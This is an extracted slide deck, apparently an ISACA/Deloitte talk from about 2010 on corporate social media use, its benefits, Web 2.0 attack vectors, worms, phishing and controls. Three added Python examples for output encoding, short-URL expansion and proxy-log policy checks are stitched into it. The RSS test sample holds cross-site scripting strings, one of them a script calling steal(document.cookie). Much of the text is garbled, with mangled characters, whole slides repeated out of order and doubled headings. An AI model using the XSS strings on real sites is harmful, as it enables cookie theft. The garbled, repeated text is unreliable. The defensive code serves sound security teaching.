Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues

Product innovation
• A leading high-tech manufacturer instituted a “submit-and-vote-for-your-favorite-idea” social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings.

Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents.
Foster creativity, innovation and collaboration (cont.)
• Best Buy
  – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees. https://mix.blueshirtnation.com
Foster creativity, innovation and collaboration (cont.)
• Deloitte’s DStreet
  – Enterprise talent networking site, changing the way we connect with each other
  – Enables another way of collaboration and community building
  – Network, build new relationships and forge successful careers
  – Learn about colleagues and interesting ways to introduce yourself
  – Identify new connection points to create a basis for meaningful conversation
  – A new way of assembling the right team
Enhance customer and partner relationships
• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allow customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provide a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allow consumers who know your products and services best to become a part of the new offering development process

Revenue growth
• A major consumer goods company improved sales by 31.5% by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value.
Enhance customer and partner relationships (cont.)
• Procter & Gamble
  – Capessa launched in the “Yahoo Health” section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving. http://realwomenrealadvice.com
Enhance customer and partner relationships (cont.)
• American Express
  – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs. http://www.openforum.com
Enhance customer and partner relationships (cont.)
• State of Louisville, Kentucky
  – Interactive audit findings on Web site. Allows the users to discuss previous audit findings. http://www.louisvilleky.gov/InternalAudit
Enhance customer and partner relationships (cont.)
• Amazon
  – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books. http://www.shelfari.com
Enhance customer and partner relationships (cont.)
• Bank of America (BofA)
  – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers, to let them know the latest update.
Risks and challenges

• Farmers and Mobsters
  – Top Facebook Applications
    • Source – http://statistics.allfacebook.com/applications/leaderboard (March 2010)
    • There are now more than 500,000 active applications on the Facebook Platform
Rank  Name                    Monthly Active Users
   1  FarmVille                         82,580,911
   2  Static FBML                       46,827,021
   3  Birthday Cards                    41,904,049
   4  Café World                        30,032,716
   5  Facebook for iPhone               29,438,848
   6  Texas HoldEm Poker                28,332,917
   7  Slide FunSpace                    25,630,033
   8  Happy Aquarium (BETA)             24,915,971
   9  Mafia Wars                        24,704,179
  10  Causes                            24,317,292
Risks and challenges (cont.)

• New security concerns and attack vectors — as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML (“AJAX”) and Rich Internet Application (“RIA”) clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 Attack Vectors — http://net-square.com/whitepapers/Top10_Web20_AV.pdf
  – Cross-site scripting (“CSS”) in AJAX, e.g. “Samy worm that exploited MySpace.com’s CSS flaw”
  – XML poisoning — poison XML blocks coming from AJAX client
  – Malicious AJAX code execution — replay of cookies for each request
  – RSS/Atom injection — inject JavaScripts into the RSS feeds to generate attack on client browser
  – Web Services Definition Language (“WSDL”) scanning and enumeration
  – Client-side validation in AJAX routines — fail to perform server-side checks
  – Web services routing issues — compromise of intermediate nodes
  – Parameter manipulation with SOAP — web services consume information and variables from SOAP
  – XPATH injection in SOAP message — bypass authentication mechanisms
  – RIA thick client binary manipulation — issues with session management
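Two of the vectors listed above, RSS/Atom injection and AJAX routines that rely on client-side validation, come down to the same defensive rule: treat everything that arrives from a feed or from the browser as data until the server has validated it and encoded it for output. The Python below is an added example, not code from the deck or from the Net-Square paper; the sample feed, the validation rules and the function names are constructed for illustration.

```python
"""Server-side validation and output encoding for AJAX and feed content.

Added example, not from the ISACA deck or the Net-Square paper. All sample
data is constructed; rule names, limits and function names are assumptions.
"""
import html
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Constructed RSS 2.0 feed. The second item carries a script tag and an
# event-handler attribute of the kind an RSS/Atom injection would plant.
# (In XML the angle brackets are entity-encoded; the parser decodes them.)
SAMPLE_RSS = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Team news</title>
<item><title>Quarterly wiki update</title>
<description>Dashboard refreshed &lt;b&gt;today&lt;/b&gt;.</description></item>
<item><title>Free gift &lt;script&gt;steal(document.cookie)&lt;/script&gt;</title>
<description>&lt;img src=x onerror="alert(1)"&gt;Click here</description></item>
</channel></rss>"""


def render_feed_items(feed_xml: str) -> List[Dict[str, str]]:
    """Parse an RSS 2.0 feed and return items with title and description
    HTML-encoded, ready to drop into a page as text rather than markup.

    Encoding (instead of trying to strip "bad" tags) is the reliable choice:
    the reader still sees the text, and the browser never parses it as HTML.
    For feeds from untrusted sources in production, parse with defusedxml to
    also block entity-expansion attacks on the XML parser itself.
    """
    root = ET.fromstring(feed_xml)
    items = []
    for item in root.iter("item"):
        items.append({
            "title": html.escape(item.findtext("title", default="")),
            "description": html.escape(item.findtext("description", default="")),
        })
    return items


# Server-side copy of the rules the AJAX client also enforces. The browser
# copy is for usability only; this copy is the actual control.
COMMENT_MAX_LEN = 500
HANDLE_RE = re.compile(r"[A-Za-z0-9_]{3,20}")


def validate_comment(payload: Dict[str, object]) -> Tuple[bool, str]:
    """Re-check an AJAX comment payload on the server. Returns (ok, reason)."""
    handle = payload.get("handle")
    body = payload.get("body")
    if not isinstance(handle, str) or not HANDLE_RE.fullmatch(handle):
        return False, "handle must be 3-20 letters, digits or underscores"
    if not isinstance(body, str) or not body.strip():
        return False, "body is required"
    if len(body) > COMMENT_MAX_LEN:
        return False, "body exceeds %d characters" % COMMENT_MAX_LEN
    return True, ""


def comment_to_html(payload: Dict[str, object]) -> str:
    """Validate, then encode both fields before they reach the page."""
    ok, reason = validate_comment(payload)
    if not ok:
        raise ValueError(reason)
    return '<p class="comment"><b>%s</b>: %s</p>' % (
        html.escape(str(payload["handle"])), html.escape(str(payload["body"])))


if __name__ == "__main__":
    for entry in render_feed_items(SAMPLE_RSS):
        print(entry["title"], "|", entry["description"])
    print(comment_to_html({"handle": "ngibbs", "body": "<script>x()</script> looks fine"}))
```

The feed parser deliberately does not try to allow "safe" HTML through; the moment a mashup wants rich formatting from a third-party feed it needs a real HTML sanitizer, which is a separate control from the encoding shown here.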
Risks and challenges (cont.)

• Example worms / phishing attacks affecting social networking sites
  – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data.
  – Fbaction – Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account.
Risks and challenges (cont.)

  – Boface – convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete the user’s Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends.
• Common element – they all take advantage of the implied trust that social networking users have with each other.
Risks and challenges (cont.)

“Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening.” – Marcus Ranum in InfoSec Magazine, May 2008

• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools.
• These worms and phishing attacks may also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
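The shortening services named above hide a link's destination until the redirect is followed. As an added example (not from the presentation), the Python below resolves the redirect chain before a link is trusted and judges the final landing host rather than the short URL; network access is abstracted behind a fetch_location callable so the logic runs offline against the constructed redirect table, and the hostnames, allowlist and function names are assumptions.

```python
"""Expand shortened URLs before trusting them.

Added example, not from the presentation. Network access is abstracted behind
a fetch_location callable so the logic runs offline against the constructed
redirect table; hostnames, the allowlist and function names are assumptions.
"""
from typing import Callable, List, Optional
from urllib.parse import urlparse

# Shortening services named on the slide; extend for your environment.
SHORTENER_HOSTS = {"bit.ly", "tr.im", "tinyurl.com"}
MAX_HOPS = 5

# Constructed redirect table standing in for real HTTP 30x responses:
# short URL -> Location header. URLs not in the table are final pages.
CONSTRUCTED_REDIRECTS = {
    "http://bit.ly/abc123": "http://tinyurl.com/xyz",
    "http://tinyurl.com/xyz": "https://intranet.example.com/wiki/page",
    "http://tr.im/evil": "http://fbaction.example.net/login",
    "http://bit.ly/loop1": "http://bit.ly/loop2",
    "http://bit.ly/loop2": "http://bit.ly/loop1",
}


def fake_fetch_location(url: str) -> Optional[str]:
    """Stand-in for a HEAD request that does not auto-follow redirects and
    returns the Location header, or None when the response is not a redirect."""
    return CONSTRUCTED_REDIRECTS.get(url)


def is_shortener(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return host in SHORTENER_HOSTS


def expand_url(url: str, fetch_location: Callable[[str], Optional[str]],
               max_hops: int = MAX_HOPS) -> List[str]:
    """Follow the redirect chain one hop at a time and return every URL
    visited, the last being the real landing page. Loops and over-long
    chains raise, since both are themselves evasion signals."""
    chain = [url]
    seen = {url}
    for _ in range(max_hops):
        nxt = fetch_location(chain[-1])
        if nxt is None:
            return chain
        if nxt in seen:
            raise ValueError("redirect loop at %s" % nxt)
        seen.add(nxt)
        chain.append(nxt)
    raise ValueError("more than %d redirects" % max_hops)


def classify_link(url: str, fetch_location: Callable[[str], Optional[str]],
                  allowed_hosts: set) -> str:
    """Decide on the final destination: 'allow' if it lands on an allowed
    host over HTTPS, 'block' if the chain misbehaves, otherwise 'review'."""
    try:
        final = expand_url(url, fetch_location)[-1]
    except ValueError:
        return "block"
    parsed = urlparse(final)
    host = (parsed.hostname or "").lower()
    if parsed.scheme == "https" and host in allowed_hosts:
        return "allow"
    return "review"


if __name__ == "__main__":
    allowed = {"intranet.example.com"}
    for link in ("http://bit.ly/abc123", "http://tr.im/evil", "http://bit.ly/loop1"):
        print(link, "->", classify_link(link, fake_fetch_location, allowed))
```

In a mail gateway or proxy, fetch_location would be a HEAD request issued with redirects disabled so each hop is inspected individually; the chain is worth logging in full, because a shortener that bounces through a second shortener is already unusual.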
Risks and challenges (cont.)

• More on phishing — social networks are a target rich environment
Risks and challenges (cont.)

• More on phishing — social networks are a target rich environment (cont.)
“Dearest One…

Sorry for the nature of this email, please bear with me.

I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father’s name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it my father died last year…” – See http://www.419legal.org for more details
• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
Risks and challenges (cont.)

• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account.
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized.
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor
• Intellectual Property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
Risks and challenges (cont.)

• Failures in the use of Social Media — most companies that use Social Media don’t approach it the way they would other mission critical technology
  – At best it can be said that most companies today are merely dabbling with Social Media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren’t fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail

“Fully half of all Social Media investments will fail.” — Gartner
Risks and challenges (cont.)

“When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'cookie monster sings chocolate rain' about 1000 times.” – Michael Scott, from The Office

• Productivity — Users employ social media tools for nonproductive purposes such as socializing (“Social Notworking”)
  http://news.bbc.co.uk/2/hi/business/8325865.stm
Risks and challenges (cont.)

• Technical Integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Sign in using your account with:
    • Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID
    • AOL, Blogger, WordPress, Netlog, OpenID, flickr
Risks and challenges (cont.)

• Information hoarding — In many industries value is placed on what an employee knows that others do not know. This belief prevents data sharing.
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom’s law, which states that — “The value of a network equals the net value of each user’s transactions conducted through that network, valued from the perspective of each user and summed for all”

Or alternatively:

  – http://en.wikipedia.org/wiki/Beckstrom's_law
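Beckstrom's law in its usual notation, as an added illustration of the quotation above (this formula is not reproduced on the slide itself; the symbol names follow the common presentation of the law, as on the Wikipedia page linked above):

$$V_{i,j} = \sum_{k=1}^{m} \frac{B_{i,j,k} - C_{i,j,k}}{(1 + r_k)^{t_k}}, \qquad V_j = \sum_{i=1}^{n} V_{i,j}$$

where $V_{i,j}$ is the present value of network $j$ to user $i$, $B_{i,j,k}$ and $C_{i,j,k}$ are the benefit and the cost of transaction $k$ to user $i$ conducted through that network, $r_k$ is the discount rate and $t_k$ the time at which the transaction occurs. The network's total value $V_j$ sums each user's own net valuation, which is the "summed for all" in the quotation. Because costs are subtracted per transaction, a network whose users transact at a loss has negative value under this law, which is what makes it usable for a business case and for auditing a Social Media investment against stated benefits.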
Risks and challenges (cont.)

• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation
A quick word on privacy

“People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time.”
— Mark Zuckerberg, Facebook founder

“If you have something that you don’t want anyone to know, maybe you shouldn’t be doing it in the first place.”
— Eric Schmidt, CEO, Google Inc.
A quick word on privacy (cont.)

• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
Responding to the risks and challenges

• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Define consequences for failure to comply, e.g. “termination of employment and legal action”
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Responding to the risks and challenges (cont.)

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Responding to the risks and challenges (cont.)

• Vulnerability Assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that Social Networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real-time
    • Visibility and policy control over application access
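The firewall points above (identify the application regardless of port, identify the user regardless of IP address, apply policy) can be exercised offline during a vulnerability or acceptable-use assessment by running the same logic over web proxy logs. The Python below is an added example, not from the deck or from any firewall vendor; the log format, application signatures and policy table are constructed, and the names are assumptions.

```python
"""Port-independent application identification over proxy logs.

Added example, not from the deck or any firewall vendor. Next-generation
firewalls apply these checks inline; the same logic applied offline to web
proxy logs supports a vulnerability or acceptable-use assessment. Log
format, application signatures and the policy table are constructed.
"""
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Constructed log lines: timestamp user src_ip dst_port method url status bytes_out
SAMPLE_LOG = """
2010-03-15T09:01:02 jdoe 10.1.2.3 443 GET https://www.facebook.com/home.php 200 512
2010-03-15T09:03:10 jdoe 10.1.2.3 443 POST https://www.facebook.com/ajax/updatestatus.php 200 2048
2010-03-15T09:05:44 asmith 10.1.2.9 80 GET http://twitter.com/ 200 300
2010-03-15T09:07:12 asmith 10.1.2.9 8080 GET http://www.myspace.com/ 200 400
2010-03-15T09:09:30 bjones 10.1.2.15 443 POST https://apps.facebook.com/upload 200 2500000
2010-03-15T09:10:01 bjones 10.1.2.15 443 GET http://bit.ly/abc123 301 0
2010-03-15T09:11:15 cwhite 10.1.2.20 443 GET https://intranet.example.com/wiki 200 900
"""

# The application is decided by hostname suffix, never by destination port.
APP_SIGNATURES = {
    "facebook.com": "facebook", "fbcdn.net": "facebook",
    "twitter.com": "twitter", "linkedin.com": "linkedin",
    "myspace.com": "myspace", "bit.ly": "url-shortener",
}
# Acceptable-use policy per application (constructed).
POLICY = {
    "facebook": "allow-read-only",   # browsing allowed, posting is not
    "twitter": "allow",
    "linkedin": "allow",
    "myspace": "block",
    "url-shortener": "alert",        # expand and inspect before trusting
}
WRITE_METHODS = {"POST", "PUT"}
UPLOAD_ALERT_BYTES = 1_000_000       # flag large outbound transfers


def identify_app(url: str) -> Optional[str]:
    """Map a URL to an application name by hostname, or None if unknown."""
    host = (urlparse(url).hostname or "").lower()
    for suffix, app in APP_SIGNATURES.items():
        if host == suffix or host.endswith("." + suffix):
            return app
    return None


def parse_line(line: str) -> Dict[str, object]:
    ts, user, src, port, method, url, status, out = line.split()
    return {"ts": ts, "user": user, "src": src, "port": int(port),
            "method": method, "url": url, "status": int(status),
            "bytes_out": int(out)}


def _finding(rec, app, action, reason) -> Dict[str, object]:
    # The user comes from the proxy's authentication field, not from the IP.
    return {"ts": rec["ts"], "user": rec["user"], "port": rec["port"],
            "app": app, "action": action, "reason": reason}


def evaluate(log_text: str) -> List[Dict[str, object]]:
    """Apply the policy to every log line and return the findings."""
    findings = []
    for line in log_text.strip().splitlines():
        rec = parse_line(line)
        app = identify_app(str(rec["url"]))
        if app is None:
            continue                       # not a social application
        action = POLICY.get(app, "alert")  # unknown social app: alert, do not ignore
        if action == "block":
            findings.append(_finding(rec, app, "block", "application not permitted"))
        elif action == "allow-read-only" and rec["method"] in WRITE_METHODS:
            findings.append(_finding(rec, app, "block", "posting to this application is not permitted"))
        elif action == "alert":
            findings.append(_finding(rec, app, "alert", "shortened URL: expand and inspect destination"))
        # Independent of the application policy: large uploads are a leakage signal.
        if rec["method"] in WRITE_METHODS and rec["bytes_out"] >= UPLOAD_ALERT_BYTES:
            findings.append(_finding(rec, app, "alert", "large upload to social application (possible data leakage)"))
    return findings


def findings_per_user(findings: List[Dict[str, object]]) -> Counter:
    """Roll findings up by user for the assessment report."""
    return Counter(f["user"] for f in findings)


if __name__ == "__main__":
    for f in evaluate(SAMPLE_LOG):
        print(f["ts"], f["user"], f["app"], "port", f["port"], f["action"], "-", f["reason"])
    print(dict(findings_per_user(evaluate(SAMPLE_LOG))))
```

Note that the MySpace request on port 8080 is still attributed to the right application, and that the findings are keyed to the authenticated user rather than to the source address; both are the properties the slide asks of next-generation firewalls. The hostname table is the weak point of this approach (it misses CDN hosts not listed and is blind inside SSL without interception), which is why the inline products do content inspection as well.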
What is next in the world of social networking

Where we are at today

• Enterprise Social Media has crossed the tipping point and is no longer considered an “emerging” technology

“The Hype Cycle” http://en.wikipedia.org/wiki/Hype_cycle
What’s next in the world of social networking

• Increase in the use of mobile devices to access Social Networks
  – Over 600 million people will use their phone to access Social Networks by 2013, an increase of more than 400% over the 2009 figure of 140 million. Source — eMarketer
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example — Facebook Connect
• Social Networks will become more pervasive — broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car’s navigation system will be able to learn your friend’s location and provide directions to them
Some further predictions

• Some quotes on social networks
  – “Probably the greatest transformative force in our generation, absent a major war” — Mark Zuckerberg, Facebook founder
  – “(Twitter is)… Something important that has the potential to change the world, though we have a long way to go” — Biz Stone, Co-founder of Twitter
Q&A

Today’s Presenters

Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Appendix

• Additional resources
  – Gopal, Raj et al. “Web 2.0 reinvents corporate networking.” Deloitte Consulting LLP (2008)
  – The Economist — A special report on social networking, January 30, 2010
  – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – “Great Wall of Facebook: The Social Network’s Plan to Dominate the Internet — and Keep Google Out” by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – “The Future is Social, Not Search, Facebook COO Says” by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
This presentation contains general information only and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.

Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
Social network — More terminology (cont.)

Social network analysis
• Mapping and measuring of relationships and flows among people, groups, organizations, computers or other information/knowledge processing entities
• The nodes in the network are the people and groups, while the links show relationships or flows between the nodes
• Provides both a visual and a mathematical analysis of human relationships
Social network — More terminology (cont.)

Blogs
• Web sites where entries are made (such as in a journal or diary) and displayed in reverse chronological order; often provide commentary or news on a particular subject
• Some function as personal online diaries or logbooks
• Combine text, images and links to other blogs and Web sites
• Typically provide archives in calendar form, local search, syndication feeds, reader comment posting, trackback links from other blogs, blogroll links to other recommended blogs, and categories of entries tagged for retrieval by topic
Social network — More terminology (cont.)

Microblogging
• Short, frequent posts with questions, information or current status
• Twitter (public) and Yammer (private) are two examples
• Social software (including Facebook, LinkedIn and MySpace) now prompts for “what’s on your mind” or similar status or mood lines
Social network — More terminology (cont.)

Wikis
• Web sites which allow users to easily add, remove, edit and change most available content
• Effective for collaborative writing and self-service Web site creation and maintenance
Social network — More terminology (cont.)

Wikis (cont.)
• Wikipedia – perhaps the best known Wiki
  – Launched on 15 January 2000
  – First edit on 16 January, followed by 1,000 articles in the first month
  – Now has 17 million articles in 270 languages, all written by volunteers
  – Billionth edit took place on 16 April 2010
  – Used by 400 million people every month
  – Claims to have 80,000 editors, although reports suggest that it has recently lost thousands, something Wikipedia disputes
  – Aims to grow to one billion users by 2015, with a focus on women and people in the developing world
  – Critics maintain that many entries are untrustworthy
  – But a disputed study has shown that for subjects such as science it comes as close as traditional encyclopedias

Statistics taken from http://www.bbc.co.uk/news/technology-12171977
Social network — More terminology (cont.)

Social networking software
• A range of tools which facilitate social networking
• Personal Web pages including bios, photos, interests, audio and video, links to friends, messages from friends and personal networks
Social network — More terminology (cont.)

Social networking software (cont.)
• Facebook – the biggest of them all
  – Over 500 million registered users
  – 50% of our active users log on to Facebook in any given day
  – About 70% of Facebook users are outside the US
  – More than 30 billion pieces of content (web links, news stories, blog posts, notes, photo albums, etc.) shared each month
  – People spend over 700 billion minutes per month on Facebook

Statistics taken from http://www.facebook.com/press/info.php?statistics (Sept 2010)

• As of March 13, 2010, Facebook was America’s most popular site according to Experian Hitwise, with 7.1% of traffic compared to Google’s 7.0%
Social network — More terminology (cont.)

Social bookmarking and tagging
• Sites which allow users to share links to sites with others
• Tags are metadata which classify content into categories
• Can be used to aid searches, create tag clouds and link disparate sources
Social network — More terminology (cont.)

Syndication and mashups
• Using feeds available from a Web site to provide an updated list of its content, in the form of a subscription, an embedded portion of a Web site, or a collection of disparate content on a particular topic
• RSS (Really Simple Syndication) or Atom syndication, with .rss, .xml or .rdf files used for the feeds
• Mashups combine data and feeds from multiple sources to provide a single integrated set of information, e.g. data plotted on a map
Social network — More terminology (cont.)

Videos and photos
• Online collections of videos and photos from users
• Users can upload, tag and rate content
Social Networking Companies

Social Media                         Popular Examples
Wikis                                Wikitravel, Wikipedia, wikiHow, WikiBooks, the TV IV
Blogs                                livejournal, WordPress, Blogger, Technorati, xanga
Social Networking                    myspace.com, LinkedIn, facebook, friendster, plaxo
RSS (Really Simple Syndication)      newsgator, Bloglines, iGoogle, FeedBurner
Presence and Microblogging           twitter, Pownce, jaiku, Hictu, tumblr
Social Bookmarking and Tagging       delicious, digg, reddit, newsvine, StumbleUpon
Online Photo and Video Sharing       YouTube, flickr, shutterfly, last.fm, slideshare
Why and how companies are using social networking
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
Statistics on companies using Social Networking (cont.)

Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies. US = 29 companies, Europe = 48 companies, Asia-Pacific = 20 companies, Latin America = 3 companies.
Source: http://www.burson-marsteller.com/Innovation_and_insights/blogs_and_podcasts/BM_Blog/Documents/Burson-Marsteller%202010%20Global%20Social%20Media%20Check-up%20white%20paper.pdf
Companies typically adopt Social Media for three major benefits

1. Increase employee productivity and operational efficiencies
2. Foster creativity, innovation and collaboration
3. Enhance customer and partner relationships
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
